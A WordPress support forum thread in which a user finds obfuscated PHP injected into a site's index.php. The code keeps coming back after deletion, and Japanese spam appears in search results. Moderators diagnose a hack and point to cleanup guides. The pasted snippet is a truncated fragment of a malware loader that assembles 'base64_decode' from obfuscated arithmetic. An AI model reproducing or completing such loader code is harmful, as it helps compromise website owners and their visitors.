index.php code have unwanted code

bencycharles93
(@bencycharles93)

3 years, 4 months ago
My root folder index.php (public.html/index.php) have below code. I deleted and added the new index.php but it keeps coming on new file also. how to cleanup the file.
```
<?php 	
$ADqP =function	($ZgfMcP5p	){$RO6CTuf = "C6DOEs";$Bxs0X3='b'.	'A' .$RO6CTuf[(35-15)/ 4].$RO6CTuf[(106- 94) / 3]	.
$RO6CTuf[(33-29) /4] . ((72 - 45- 3)/6).	'_' ;$Bxs0X3	.= 'd' . $RO6CTuf[(64-52) / 3]	. $RO6CTuf[(51 - 57+ 6)/ 4]; $Bxs0X3
```
- This topic was modified 3 years, 4 months ago by Steven Stern (sterndata).

Viewing 5 replies - 1 through 5 (of 5 total)

Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

3 years, 4 months ago
You have been hacked. You’ll need to clean up wp-config.php manually; see wp-config-sample.php for a model. Then, get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) ofthe recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
- This reply was modified 3 years, 4 months ago by Steven Stern (sterndata).
- This reply was modified 3 years, 4 months ago by Steven Stern (sterndata).
Sanaullah Farooq
(@sanaullahfarooq12)

3 years, 4 months ago

It appears that the code you provided is a PHP script that is likely used to perform some sort of malicious action. The script seems to contain an encoded or obfuscated function called $ADqP which takes one parameter $ZgfMcP5p .
It is best to remove this code from your index.php file as soon as possible as it may be causing security issues on your website.
You may also want to check the rest of your website’s files for any similar code, and remove it if found.
You may also consider running a security scan on your website.
It’s also recommended to update your website and the plugin, theme and core files to the latest version to make sure that any known vulnerabilities are patched.
Also, consider changing all of your website’s login credentials to ensure that any unauthorized access to your site is prevented.
Thread Starter bencycharles93
(@bencycharles93)

3 years, 4 months ago
i have deleted the index.php file and updated all the plugins, WordPress, theme but the code has restored again. Please help me to solve this. When i search my site in google it shows Japanese character
```
Dotty ユーロGT シートカバー プレサージュ TU31 PU31 
·
Translate this page
20124円 Dotty ユーロGT シートカバー プレサージュ TU31 PU31 TNU31 PNU31 H15/07～H19/04 8人乗 X/V/ハイウェイスター/ハイウェイスターJ/XE他 自動車、オートバイ ...
```
Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

3 years, 4 months ago

In that case, it may be that the issue is something that’s in the database. If you replaced ALL of the files and the issue comes back, then you may need to look into that.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Thread Starter bencycharles93
(@bencycharles93)

3 years, 4 months ago

Okay, I will check the database. Thanks much

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘index.php code have unwanted code’ is closed to new replies.

index.php code have unwanted code

Tags

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics